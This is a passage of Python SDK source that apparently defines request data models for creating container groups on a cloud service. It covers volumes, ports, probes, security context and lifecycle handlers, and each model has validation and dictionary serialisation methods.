            'Server': self.server,
            'UserName': self.user_name,
            'Password': self.password,
        }

    def from_map(self, map={}):
        self.server = map.get('Server')
        self.user_name = map.get('UserName')
        self.password = map.get('Password')
        return self
class CreateContainerGroupRequestContainerVolumeMount(TeaModel):
    """A container volume mount: path, read-only flag, volume name, sub-path.

    Only mount_path and read_only are required; name and sub_path are optional.
    """
    def __init__(self, mount_path=None, read_only=None, name=None, sub_path=None):
        self.mount_path = mount_path
        self.read_only = read_only
        self.name = name
        self.sub_path = sub_path

    def validate(self):
        for value, label in ((self.mount_path, 'mount_path'), (self.read_only, 'read_only')):
            self.validate_required(value, label)

    def to_map(self):
        return {
            'MountPath': self.mount_path,
            'ReadOnly': self.read_only,
            'Name': self.name,
            'SubPath': self.sub_path,
        }

    def from_map(self, map={}):
        for attr, key in (
            ('mount_path', 'MountPath'),
            ('read_only', 'ReadOnly'),
            ('name', 'Name'),
            ('sub_path', 'SubPath'),
        ):
            setattr(self, attr, map.get(key))
        return self
class CreateContainerGroupRequestContainerPort(TeaModel):
    """An exposed container port: protocol plus port number, both required."""
    def __init__(self, protocol=None, port=None):
        self.protocol = protocol
        self.port = port

    def validate(self):
        for value, name in ((self.protocol, 'protocol'), (self.port, 'port')):
            self.validate_required(value, name)

    def to_map(self):
        return {'Protocol': self.protocol, 'Port': self.port}

    def from_map(self, map={}):
        self.protocol = map.get('Protocol')
        self.port = map.get('Port')
        return self
class CreateContainerGroupRequestContainerEnvironmentVarFieldRef(TeaModel):
    """Field reference for an environment variable: a single FieldPath value."""
    def __init__(self, field_path=None):
        self.field_path = field_path

    def validate(self):
        # No required fields on this model.
        pass

    def to_map(self):
        return {'FieldPath': self.field_path}

    def from_map(self, map={}):
        self.field_path = map.get('FieldPath')
        return self
class CreateContainerGroupRequestContainerEnvironmentVar(TeaModel):
    """Environment variable entry: key, value, and a required field reference."""
    def __init__(self, key=None, value=None, field_ref=None):
        self.key = key
        self.value = value
        self.field_ref = field_ref

    def validate(self):
        # Only field_ref is required; it validates recursively.
        self.validate_required(self.field_ref, 'field_ref')
        if self.field_ref:
            self.field_ref.validate()

    def to_map(self):
        return {
            'Key': self.key,
            'Value': self.value,
            'FieldRef': self.field_ref.to_map() if self.field_ref is not None else None,
        }

    def from_map(self, map={}):
        self.key = map.get('Key')
        self.value = map.get('Value')
        raw_ref = map.get('FieldRef')
        if raw_ref is None:
            self.field_ref = None
        else:
            self.field_ref = CreateContainerGroupRequestContainerEnvironmentVarFieldRef().from_map(raw_ref)
        return self
class CreateContainerGroupRequestContainerReadinessProbeHttpGet(TeaModel):
    """HTTP-GET action of the readiness probe: path, port and scheme."""
    def __init__(self, path=None, port=None, scheme=None):
        self.path = path
        self.port = port
        self.scheme = scheme

    def validate(self):
        # No required fields on this model.
        pass

    def to_map(self):
        return {'Path': self.path, 'Port': self.port, 'Scheme': self.scheme}

    def from_map(self, map={}):
        for attr, key in (('path', 'Path'), ('port', 'Port'), ('scheme', 'Scheme')):
            setattr(self, attr, map.get(key))
        return self
class CreateContainerGroupRequestContainerReadinessProbeExec(TeaModel):
    """Exec action of the readiness probe: the command list under 'Command'.

    Fix: the generated __init__ ignored its `command` argument and always
    reset the field to an empty list; it now honors a caller-supplied list
    while keeping the historical [] default when omitted.
    """
    def __init__(self, command=None):
        # Honor the constructor argument; None keeps the old [] default.
        self.command = [] if command is None else command

    def validate(self):
        self.validate_required(self.command, 'command')

    def to_map(self):
        result = {}
        if self.command is not None:
            result['Command'] = list(self.command)
        else:
            result['Command'] = None
        return result

    def from_map(self, map={}):
        raw = map.get('Command')
        self.command = None if raw is None else list(raw)
        return self
class CreateContainerGroupRequestContainerReadinessProbeTcpSocket(TeaModel):
    """TCP-socket action of the readiness probe: a single Port value."""
    def __init__(self, port=None):
        self.port = port

    def validate(self):
        # No required fields on this model.
        pass

    def to_map(self):
        return {'Port': self.port}

    def from_map(self, map={}):
        self.port = map.get('Port')
        return self
class CreateContainerGroupRequestContainerReadinessProbe(TeaModel):
    """Readiness probe: HttpGet/Exec/TcpSocket handlers plus timing settings."""
    def __init__(self, http_get=None, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None, exec=None, tcp_socket=None):
        self.http_get = http_get
        self.initial_delay_seconds = initial_delay_seconds
        self.period_seconds = period_seconds
        self.success_threshold = success_threshold
        self.failure_threshold = failure_threshold
        self.timeout_seconds = timeout_seconds
        self.exec = exec
        self.tcp_socket = tcp_socket

    def validate(self):
        # Each handler model is required and validated recursively.
        for value, name in (
            (self.http_get, 'http_get'),
            (self.exec, 'exec'),
            (self.tcp_socket, 'tcp_socket'),
        ):
            self.validate_required(value, name)
            if value:
                value.validate()

    def to_map(self):
        return {
            'HttpGet': self.http_get.to_map() if self.http_get is not None else None,
            'InitialDelaySeconds': self.initial_delay_seconds,
            'PeriodSeconds': self.period_seconds,
            'SuccessThreshold': self.success_threshold,
            'FailureThreshold': self.failure_threshold,
            'TimeoutSeconds': self.timeout_seconds,
            'Exec': self.exec.to_map() if self.exec is not None else None,
            'TcpSocket': self.tcp_socket.to_map() if self.tcp_socket is not None else None,
        }

    def from_map(self, map={}):
        raw = map.get('HttpGet')
        self.http_get = None if raw is None else CreateContainerGroupRequestContainerReadinessProbeHttpGet().from_map(raw)
        self.initial_delay_seconds = map.get('InitialDelaySeconds')
        self.period_seconds = map.get('PeriodSeconds')
        self.success_threshold = map.get('SuccessThreshold')
        self.failure_threshold = map.get('FailureThreshold')
        self.timeout_seconds = map.get('TimeoutSeconds')
        raw = map.get('Exec')
        self.exec = None if raw is None else CreateContainerGroupRequestContainerReadinessProbeExec().from_map(raw)
        raw = map.get('TcpSocket')
        self.tcp_socket = None if raw is None else CreateContainerGroupRequestContainerReadinessProbeTcpSocket().from_map(raw)
        return self
class CreateContainerGroupRequestContainerLivenessProbeHttpGet(TeaModel):
    """HTTP-GET action of the liveness probe: path, port and scheme."""
    def __init__(self, path=None, port=None, scheme=None):
        self.path = path
        self.port = port
        self.scheme = scheme

    def validate(self):
        # No required fields on this model.
        pass

    def to_map(self):
        return {'Path': self.path, 'Port': self.port, 'Scheme': self.scheme}

    def from_map(self, map={}):
        for attr, key in (('path', 'Path'), ('port', 'Port'), ('scheme', 'Scheme')):
            setattr(self, attr, map.get(key))
        return self
class CreateContainerGroupRequestContainerLivenessProbeExec(TeaModel):
    """Exec action of the liveness probe: the command list under 'Command'.

    Fix: the generated __init__ ignored its `command` argument and always
    reset the field to an empty list; it now honors a caller-supplied list
    while keeping the historical [] default when omitted.
    """
    def __init__(self, command=None):
        # Honor the constructor argument; None keeps the old [] default.
        self.command = [] if command is None else command

    def validate(self):
        self.validate_required(self.command, 'command')

    def to_map(self):
        result = {}
        if self.command is not None:
            result['Command'] = list(self.command)
        else:
            result['Command'] = None
        return result

    def from_map(self, map={}):
        raw = map.get('Command')
        self.command = None if raw is None else list(raw)
        return self
class CreateContainerGroupRequestContainerLivenessProbeTcpSocket(TeaModel):
    """TCP-socket action of the liveness probe: a single Port value."""
    def __init__(self, port=None):
        self.port = port

    def validate(self):
        # No required fields on this model.
        pass

    def to_map(self):
        return {'Port': self.port}

    def from_map(self, map={}):
        self.port = map.get('Port')
        return self
class CreateContainerGroupRequestContainerLivenessProbe(TeaModel):
    """Liveness probe: HttpGet/Exec/TcpSocket handlers plus timing settings."""
    def __init__(self, http_get=None, initial_delay_seconds=None, period_seconds=None, success_threshold=None, failure_threshold=None, timeout_seconds=None, exec=None, tcp_socket=None):
        self.http_get = http_get
        self.initial_delay_seconds = initial_delay_seconds
        self.period_seconds = period_seconds
        self.success_threshold = success_threshold
        self.failure_threshold = failure_threshold
        self.timeout_seconds = timeout_seconds
        self.exec = exec
        self.tcp_socket = tcp_socket

    def validate(self):
        # Each handler model is required and validated recursively.
        for value, name in (
            (self.http_get, 'http_get'),
            (self.exec, 'exec'),
            (self.tcp_socket, 'tcp_socket'),
        ):
            self.validate_required(value, name)
            if value:
                value.validate()

    def to_map(self):
        return {
            'HttpGet': self.http_get.to_map() if self.http_get is not None else None,
            'InitialDelaySeconds': self.initial_delay_seconds,
            'PeriodSeconds': self.period_seconds,
            'SuccessThreshold': self.success_threshold,
            'FailureThreshold': self.failure_threshold,
            'TimeoutSeconds': self.timeout_seconds,
            'Exec': self.exec.to_map() if self.exec is not None else None,
            'TcpSocket': self.tcp_socket.to_map() if self.tcp_socket is not None else None,
        }

    def from_map(self, map={}):
        raw = map.get('HttpGet')
        self.http_get = None if raw is None else CreateContainerGroupRequestContainerLivenessProbeHttpGet().from_map(raw)
        self.initial_delay_seconds = map.get('InitialDelaySeconds')
        self.period_seconds = map.get('PeriodSeconds')
        self.success_threshold = map.get('SuccessThreshold')
        self.failure_threshold = map.get('FailureThreshold')
        self.timeout_seconds = map.get('TimeoutSeconds')
        raw = map.get('Exec')
        self.exec = None if raw is None else CreateContainerGroupRequestContainerLivenessProbeExec().from_map(raw)
        raw = map.get('TcpSocket')
        self.tcp_socket = None if raw is None else CreateContainerGroupRequestContainerLivenessProbeTcpSocket().from_map(raw)
        return self
class CreateContainerGroupRequestContainerSecurityContextCapability(TeaModel):
    """Security-context capability model: the list of values under 'Add'.

    Fix: the generated __init__ ignored its `add` argument and always reset
    the field to an empty list; it now honors a caller-supplied list while
    keeping the historical [] default when omitted.
    """
    def __init__(self, add=None):
        # Honor the constructor argument; None keeps the old [] default.
        self.add = [] if add is None else add

    def validate(self):
        self.validate_required(self.add, 'add')

    def to_map(self):
        result = {}
        if self.add is not None:
            result['Add'] = list(self.add)
        else:
            result['Add'] = None
        return result

    def from_map(self, map={}):
        raw = map.get('Add')
        self.add = None if raw is None else list(raw)
        return self
class CreateContainerGroupRequestContainerSecurityContext(TeaModel):
    """Security context of a container: capability sub-model plus scalar flags."""
    def __init__(self, capability=None, read_only_root_filesystem=None, run_as_user=None):
        self.capability = capability                              # sub-model (required)
        self.read_only_root_filesystem = read_only_root_filesystem
        self.run_as_user = run_as_user
    def validate(self):
        """`capability` is required; cascade its validation when present."""
        self.validate_required(self.capability, 'capability')
        if self.capability:
            self.capability.validate()
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        capability = self.capability.to_map() if self.capability is not None else None
        return {
            'Capability': capability,
            'ReadOnlyRootFilesystem': self.read_only_root_filesystem,
            'RunAsUser': self.run_as_user,
        }
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        raw = map.get('Capability')
        self.capability = (CreateContainerGroupRequestContainerSecurityContextCapability().from_map(raw)
                           if raw is not None else None)
        self.read_only_root_filesystem = map.get('ReadOnlyRootFilesystem')
        self.run_as_user = map.get('RunAsUser')
        return self
class CreateContainerGroupRequestContainerLifecyclePostStartHandlerHttpGetHttpHeader(TeaModel):
    """One name/value HTTP header for the post-start HTTP-GET handler."""
    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value
    def validate(self):
        """Both fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Name': self.name, 'Value': self.value}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.name, self.value = map.get('Name'), map.get('Value')
        return self
class CreateContainerGroupRequestContainerLifecyclePreStopHandlerHttpGetHttpHeader(TeaModel):
    """One name/value HTTP header for the pre-stop HTTP-GET handler."""
    def __init__(self, name=None, value=None):
        self.name = name
        self.value = value
    def validate(self):
        """Both fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Name': self.name, 'Value': self.value}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.name, self.value = map.get('Name'), map.get('Value')
        return self
class CreateContainerGroupRequestContainer(TeaModel):
    """A container definition inside a CreateContainerGroup request.

    Carries image/resource settings, probes, a security context and the
    flattened lifecycle post-start / pre-stop handler fields.

    Fix over the generated original: ``__init__`` discarded the caller's
    value for every list parameter (``command``, ``arg``, ``volume_mount``,
    ``port``, ``environment_var`` and the lifecycle ``*_http_header`` /
    ``*_exec`` lists) and always reset them to empty lists; those
    arguments are now honoured.
    """
    def __init__(self, image=None, name=None, cpu=None, memory=None,
                 working_dir=None, image_pull_policy=None, command=None,
                 arg=None, volume_mount=None, port=None, environment_var=None,
                 readiness_probe=None, liveness_probe=None,
                 security_context=None, stdin=None, stdin_once=None, tty=None,
                 gpu=None,
                 lifecycle_post_start_handler_http_get_host=None,
                 lifecycle_post_start_handler_http_get_port=None,
                 lifecycle_post_start_handler_http_get_path=None,
                 lifecycle_post_start_handler_http_get_scheme=None,
                 lifecycle_post_start_handler_http_get_http_header=None,
                 lifecycle_post_start_handler_exec=None,
                 lifecycle_post_start_handler_tcp_socket_host=None,
                 lifecycle_post_start_handler_tcp_socket_port=None,
                 lifecycle_pre_stop_handler_http_get_host=None,
                 lifecycle_pre_stop_handler_http_get_port=None,
                 lifecycle_pre_stop_handler_http_get_path=None,
                 lifecycle_pre_stop_handler_http_get_scheme=None,
                 lifecycle_pre_stop_handler_http_get_http_header=None,
                 lifecycle_pre_stop_handler_exec=None,
                 lifecycle_pre_stop_handler_tcp_socket_host=None,
                 lifecycle_pre_stop_handler_tcp_socket_port=None,
                 termination_message_path=None,
                 termination_message_policy=None):
        self.image = image
        self.name = name
        self.cpu = cpu
        self.memory = memory
        self.working_dir = working_dir
        self.image_pull_policy = image_pull_policy
        # List fields: honour caller-supplied values, defaulting to [] (bug
        # fix — the generated code unconditionally reset them to []).
        self.command = command if command is not None else []
        self.arg = arg if arg is not None else []
        self.volume_mount = volume_mount if volume_mount is not None else []
        self.port = port if port is not None else []
        self.environment_var = environment_var if environment_var is not None else []
        self.readiness_probe = readiness_probe
        self.liveness_probe = liveness_probe
        self.security_context = security_context
        self.stdin = stdin
        self.stdin_once = stdin_once
        self.tty = tty
        self.gpu = gpu
        self.lifecycle_post_start_handler_http_get_host = lifecycle_post_start_handler_http_get_host
        self.lifecycle_post_start_handler_http_get_port = lifecycle_post_start_handler_http_get_port
        self.lifecycle_post_start_handler_http_get_path = lifecycle_post_start_handler_http_get_path
        self.lifecycle_post_start_handler_http_get_scheme = lifecycle_post_start_handler_http_get_scheme
        self.lifecycle_post_start_handler_http_get_http_header = (
            lifecycle_post_start_handler_http_get_http_header
            if lifecycle_post_start_handler_http_get_http_header is not None else [])
        self.lifecycle_post_start_handler_exec = (
            lifecycle_post_start_handler_exec
            if lifecycle_post_start_handler_exec is not None else [])
        self.lifecycle_post_start_handler_tcp_socket_host = lifecycle_post_start_handler_tcp_socket_host
        self.lifecycle_post_start_handler_tcp_socket_port = lifecycle_post_start_handler_tcp_socket_port
        self.lifecycle_pre_stop_handler_http_get_host = lifecycle_pre_stop_handler_http_get_host
        self.lifecycle_pre_stop_handler_http_get_port = lifecycle_pre_stop_handler_http_get_port
        self.lifecycle_pre_stop_handler_http_get_path = lifecycle_pre_stop_handler_http_get_path
        self.lifecycle_pre_stop_handler_http_get_scheme = lifecycle_pre_stop_handler_http_get_scheme
        self.lifecycle_pre_stop_handler_http_get_http_header = (
            lifecycle_pre_stop_handler_http_get_http_header
            if lifecycle_pre_stop_handler_http_get_http_header is not None else [])
        self.lifecycle_pre_stop_handler_exec = (
            lifecycle_pre_stop_handler_exec
            if lifecycle_pre_stop_handler_exec is not None else [])
        self.lifecycle_pre_stop_handler_tcp_socket_host = lifecycle_pre_stop_handler_tcp_socket_host
        self.lifecycle_pre_stop_handler_tcp_socket_port = lifecycle_pre_stop_handler_tcp_socket_port
        self.termination_message_path = termination_message_path
        self.termination_message_policy = termination_message_policy
    def validate(self):
        """Validate required fields and cascade into nested sub-models."""
        self.validate_required(self.image, 'image')
        self.validate_required(self.name, 'name')
        for models in (self.volume_mount, self.port, self.environment_var):
            if models:
                for k in models:
                    if k:
                        k.validate()
        self.validate_required(self.readiness_probe, 'readiness_probe')
        if self.readiness_probe:
            self.readiness_probe.validate()
        self.validate_required(self.liveness_probe, 'liveness_probe')
        if self.liveness_probe:
            self.liveness_probe.validate()
        self.validate_required(self.security_context, 'security_context')
        if self.security_context:
            self.security_context.validate()
        for headers in (self.lifecycle_post_start_handler_http_get_http_header,
                        self.lifecycle_pre_stop_handler_http_get_http_header):
            if headers:
                for k in headers:
                    if k:
                        k.validate()
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        def dump(models):
            # List of sub-models -> list of dicts; a None list stays None.
            if models is None:
                return None
            return [m.to_map() if m else None for m in models]
        return {
            'Image': self.image,
            'Name': self.name,
            'Cpu': self.cpu,
            'Memory': self.memory,
            'WorkingDir': self.working_dir,
            'ImagePullPolicy': self.image_pull_policy,
            'Command': list(self.command) if self.command is not None else None,
            'Arg': list(self.arg) if self.arg is not None else None,
            'VolumeMount': dump(self.volume_mount),
            'Port': dump(self.port),
            'EnvironmentVar': dump(self.environment_var),
            'ReadinessProbe': self.readiness_probe.to_map() if self.readiness_probe is not None else None,
            'LivenessProbe': self.liveness_probe.to_map() if self.liveness_probe is not None else None,
            'SecurityContext': self.security_context.to_map() if self.security_context is not None else None,
            'Stdin': self.stdin,
            'StdinOnce': self.stdin_once,
            'Tty': self.tty,
            'Gpu': self.gpu,
            'LifecyclePostStartHandlerHttpGetHost': self.lifecycle_post_start_handler_http_get_host,
            'LifecyclePostStartHandlerHttpGetPort': self.lifecycle_post_start_handler_http_get_port,
            'LifecyclePostStartHandlerHttpGetPath': self.lifecycle_post_start_handler_http_get_path,
            'LifecyclePostStartHandlerHttpGetScheme': self.lifecycle_post_start_handler_http_get_scheme,
            'LifecyclePostStartHandlerHttpGetHttpHeader': dump(self.lifecycle_post_start_handler_http_get_http_header),
            'LifecyclePostStartHandlerExec': (list(self.lifecycle_post_start_handler_exec)
                                              if self.lifecycle_post_start_handler_exec is not None else None),
            'LifecyclePostStartHandlerTcpSocketHost': self.lifecycle_post_start_handler_tcp_socket_host,
            'LifecyclePostStartHandlerTcpSocketPort': self.lifecycle_post_start_handler_tcp_socket_port,
            'LifecyclePreStopHandlerHttpGetHost': self.lifecycle_pre_stop_handler_http_get_host,
            'LifecyclePreStopHandlerHttpGetPort': self.lifecycle_pre_stop_handler_http_get_port,
            'LifecyclePreStopHandlerHttpGetPath': self.lifecycle_pre_stop_handler_http_get_path,
            'LifecyclePreStopHandlerHttpGetScheme': self.lifecycle_pre_stop_handler_http_get_scheme,
            'LifecyclePreStopHandlerHttpGetHttpHeader': dump(self.lifecycle_pre_stop_handler_http_get_http_header),
            'LifecyclePreStopHandlerExec': (list(self.lifecycle_pre_stop_handler_exec)
                                            if self.lifecycle_pre_stop_handler_exec is not None else None),
            'LifecyclePreStopHandlerTcpSocketHost': self.lifecycle_pre_stop_handler_tcp_socket_host,
            'LifecyclePreStopHandlerTcpSocketPort': self.lifecycle_pre_stop_handler_tcp_socket_port,
            'TerminationMessagePath': self.termination_message_path,
            'TerminationMessagePolicy': self.termination_message_policy,
        }
    def from_map(self, map=None):
        """Populate from a wire-format dict; returns self for chaining."""
        map = map if map is not None else {}
        def load(key, model_cls):
            # List of dicts -> list of model_cls; missing/None key -> None.
            items = map.get(key)
            if items is None:
                return None
            return [model_cls().from_map(k) for k in items]
        self.image = map.get('Image')
        self.name = map.get('Name')
        self.cpu = map.get('Cpu')
        self.memory = map.get('Memory')
        self.working_dir = map.get('WorkingDir')
        self.image_pull_policy = map.get('ImagePullPolicy')
        self.command = list(map['Command']) if map.get('Command') is not None else None
        self.arg = list(map['Arg']) if map.get('Arg') is not None else None
        self.volume_mount = load('VolumeMount', CreateContainerGroupRequestContainerVolumeMount)
        self.port = load('Port', CreateContainerGroupRequestContainerPort)
        self.environment_var = load('EnvironmentVar', CreateContainerGroupRequestContainerEnvironmentVar)
        raw = map.get('ReadinessProbe')
        self.readiness_probe = (CreateContainerGroupRequestContainerReadinessProbe().from_map(raw)
                                if raw is not None else None)
        raw = map.get('LivenessProbe')
        self.liveness_probe = (CreateContainerGroupRequestContainerLivenessProbe().from_map(raw)
                               if raw is not None else None)
        raw = map.get('SecurityContext')
        self.security_context = (CreateContainerGroupRequestContainerSecurityContext().from_map(raw)
                                 if raw is not None else None)
        self.stdin = map.get('Stdin')
        self.stdin_once = map.get('StdinOnce')
        self.tty = map.get('Tty')
        self.gpu = map.get('Gpu')
        self.lifecycle_post_start_handler_http_get_host = map.get('LifecyclePostStartHandlerHttpGetHost')
        self.lifecycle_post_start_handler_http_get_port = map.get('LifecyclePostStartHandlerHttpGetPort')
        self.lifecycle_post_start_handler_http_get_path = map.get('LifecyclePostStartHandlerHttpGetPath')
        self.lifecycle_post_start_handler_http_get_scheme = map.get('LifecyclePostStartHandlerHttpGetScheme')
        self.lifecycle_post_start_handler_http_get_http_header = load(
            'LifecyclePostStartHandlerHttpGetHttpHeader',
            CreateContainerGroupRequestContainerLifecyclePostStartHandlerHttpGetHttpHeader)
        self.lifecycle_post_start_handler_exec = (
            list(map['LifecyclePostStartHandlerExec'])
            if map.get('LifecyclePostStartHandlerExec') is not None else None)
        self.lifecycle_post_start_handler_tcp_socket_host = map.get('LifecyclePostStartHandlerTcpSocketHost')
        self.lifecycle_post_start_handler_tcp_socket_port = map.get('LifecyclePostStartHandlerTcpSocketPort')
        self.lifecycle_pre_stop_handler_http_get_host = map.get('LifecyclePreStopHandlerHttpGetHost')
        self.lifecycle_pre_stop_handler_http_get_port = map.get('LifecyclePreStopHandlerHttpGetPort')
        self.lifecycle_pre_stop_handler_http_get_path = map.get('LifecyclePreStopHandlerHttpGetPath')
        self.lifecycle_pre_stop_handler_http_get_scheme = map.get('LifecyclePreStopHandlerHttpGetScheme')
        self.lifecycle_pre_stop_handler_http_get_http_header = load(
            'LifecyclePreStopHandlerHttpGetHttpHeader',
            CreateContainerGroupRequestContainerLifecyclePreStopHandlerHttpGetHttpHeader)
        self.lifecycle_pre_stop_handler_exec = (
            list(map['LifecyclePreStopHandlerExec'])
            if map.get('LifecyclePreStopHandlerExec') is not None else None)
        self.lifecycle_pre_stop_handler_tcp_socket_host = map.get('LifecyclePreStopHandlerTcpSocketHost')
        self.lifecycle_pre_stop_handler_tcp_socket_port = map.get('LifecyclePreStopHandlerTcpSocketPort')
        self.termination_message_path = map.get('TerminationMessagePath')
        self.termination_message_policy = map.get('TerminationMessagePolicy')
        return self
class CreateContainerGroupRequestVolumeNFSVolume(TeaModel):
    """NFS-backed volume settings (server, path, read-only flag)."""
    def __init__(self, server=None, path=None, read_only=None):
        self.server = server
        self.path = path
        self.read_only = read_only
    def validate(self):
        """All fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Server': self.server, 'Path': self.path, 'ReadOnly': self.read_only}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.server = map.get('Server')
        self.path = map.get('Path')
        self.read_only = map.get('ReadOnly')
        return self
class CreateContainerGroupRequestVolumeConfigFileVolumeConfigFileToPath(TeaModel):
    """One file entry of a config-file volume: content, target path and mode."""
    def __init__(self, content=None, path=None, mode=None):
        self.content = content
        self.path = path
        self.mode = mode
    def validate(self):
        """All fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Content': self.content, 'Path': self.path, 'Mode': self.mode}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.content = map.get('Content')
        self.path = map.get('Path')
        self.mode = map.get('Mode')
        return self
class CreateContainerGroupRequestVolumeConfigFileVolume(TeaModel):
    """A config-file volume: a list of file entries plus a default mode.

    Fix over the generated original: ``__init__`` ignored its
    ``config_file_to_path`` argument and always reset it to an empty list;
    the caller's value is now honoured.
    """
    def __init__(self, config_file_to_path=None, default_mode=None):
        self.config_file_to_path = (config_file_to_path
                                    if config_file_to_path is not None else [])
        self.default_mode = default_mode
    def validate(self):
        """`config_file_to_path` is required; cascade into each entry."""
        self.validate_required(self.config_file_to_path, 'config_file_to_path')
        if self.config_file_to_path:
            for k in self.config_file_to_path:
                if k:
                    k.validate()
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        if self.config_file_to_path is None:
            files = None
        else:
            files = [k.to_map() if k else None for k in self.config_file_to_path]
        return {'ConfigFileToPath': files, 'DefaultMode': self.default_mode}
    def from_map(self, map=None):
        """Populate from a wire-format dict; returns self for chaining."""
        map = map if map is not None else {}
        if map.get('ConfigFileToPath') is not None:
            self.config_file_to_path = [
                CreateContainerGroupRequestVolumeConfigFileVolumeConfigFileToPath().from_map(k)
                for k in map['ConfigFileToPath']]
        else:
            self.config_file_to_path = None
        self.default_mode = map.get('DefaultMode')
        return self
class CreateContainerGroupRequestVolumeEmptyDirVolume(TeaModel):
    """Empty-directory volume settings (storage medium only)."""
    def __init__(self, medium=None):
        self.medium = medium
    def validate(self):
        """`medium` is optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Medium': self.medium}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.medium = map.get('Medium')
        return self
class CreateContainerGroupRequestVolumeDiskVolume(TeaModel):
    """Disk-backed volume settings (disk id, filesystem type, size)."""
    def __init__(self, disk_id=None, fs_type=None, disk_size=None):
        self.disk_id = disk_id
        self.fs_type = fs_type
        self.disk_size = disk_size
    def validate(self):
        """All fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'DiskId': self.disk_id, 'FsType': self.fs_type, 'DiskSize': self.disk_size}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.disk_id = map.get('DiskId')
        self.fs_type = map.get('FsType')
        self.disk_size = map.get('DiskSize')
        return self
class CreateContainerGroupRequestVolumeFlexVolume(TeaModel):
    """Flex-volume settings (driver, filesystem type, options)."""
    def __init__(self, driver=None, fs_type=None, options=None):
        self.driver = driver
        self.fs_type = fs_type
        self.options = options
    def validate(self):
        """All fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Driver': self.driver, 'FsType': self.fs_type, 'Options': self.options}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.driver = map.get('Driver')
        self.fs_type = map.get('FsType')
        self.options = map.get('Options')
        return self
class CreateContainerGroupRequestVolumeHostPathVolume(TeaModel):
    """Host-path volume settings (type and path)."""
    def __init__(self, type=None, path=None):
        self.type = type
        self.path = path
    def validate(self):
        """Both fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Type': self.type, 'Path': self.path}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.type, self.path = map.get('Type'), map.get('Path')
        return self
class CreateContainerGroupRequestVolume(TeaModel):
    """A named volume in a CreateContainerGroup request, with one sub-model
    per possible backing kind (NFS, config-file, empty-dir, disk, flex,
    host-path)."""
    def __init__(self, name=None, nfsvolume=None, config_file_volume=None, type=None,
                 empty_dir_volume=None, disk_volume=None, flex_volume=None,
                 host_path_volume=None):
        self.name = name
        self.nfsvolume = nfsvolume
        self.config_file_volume = config_file_volume
        self.type = type
        self.empty_dir_volume = empty_dir_volume
        self.disk_volume = disk_volume
        self.flex_volume = flex_volume
        self.host_path_volume = host_path_volume
    def _backings(self):
        """Yield (attr name, wire key, model class) for each backing sub-model."""
        return (
            ('nfsvolume', 'NFSVolume', CreateContainerGroupRequestVolumeNFSVolume),
            ('config_file_volume', 'ConfigFileVolume', CreateContainerGroupRequestVolumeConfigFileVolume),
            ('empty_dir_volume', 'EmptyDirVolume', CreateContainerGroupRequestVolumeEmptyDirVolume),
            ('disk_volume', 'DiskVolume', CreateContainerGroupRequestVolumeDiskVolume),
            ('flex_volume', 'FlexVolume', CreateContainerGroupRequestVolumeFlexVolume),
            ('host_path_volume', 'HostPathVolume', CreateContainerGroupRequestVolumeHostPathVolume),
        )
    def validate(self):
        """Every backing sub-model is required; cascade validation into each."""
        for attr, _key, _cls in self._backings():
            value = getattr(self, attr)
            self.validate_required(value, attr)
            if value:
                value.validate()
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        result = {'Name': self.name, 'Type': self.type}
        for attr, key, _cls in self._backings():
            value = getattr(self, attr)
            result[key] = value.to_map() if value is not None else None
        return result
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.name = map.get('Name')
        self.type = map.get('Type')
        for attr, key, model_cls in self._backings():
            raw = map.get(key)
            setattr(self, attr, model_cls().from_map(raw) if raw is not None else None)
        return self
class CreateContainerGroupRequestInitContainerVolumeMount(TeaModel):
    """A volume mount of an init container (path, read-only flag, name, sub-path)."""
    def __init__(self, mount_path=None, read_only=None, name=None, sub_path=None):
        self.mount_path = mount_path
        self.read_only = read_only
        self.name = name
        self.sub_path = sub_path
    def validate(self):
        """All fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {
            'MountPath': self.mount_path,
            'ReadOnly': self.read_only,
            'Name': self.name,
            'SubPath': self.sub_path,
        }
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.mount_path = map.get('MountPath')
        self.read_only = map.get('ReadOnly')
        self.name = map.get('Name')
        self.sub_path = map.get('SubPath')
        return self
class CreateContainerGroupRequestInitContainerPort(TeaModel):
    """A protocol/port pair exposed by an init container."""
    def __init__(self, protocol=None, port=None):
        self.protocol = protocol
        self.port = port
    def validate(self):
        """Both fields are optional; nothing to check."""
        pass
    def to_map(self):
        """Serialize to a dict keyed by wire-format names."""
        return {'Protocol': self.protocol, 'Port': self.port}
    def from_map(self, map={}):
        """Populate from a wire-format dict; returns self for chaining."""
        self.protocol, self.port = map.get('Protocol'), map.get('Port')
        return self
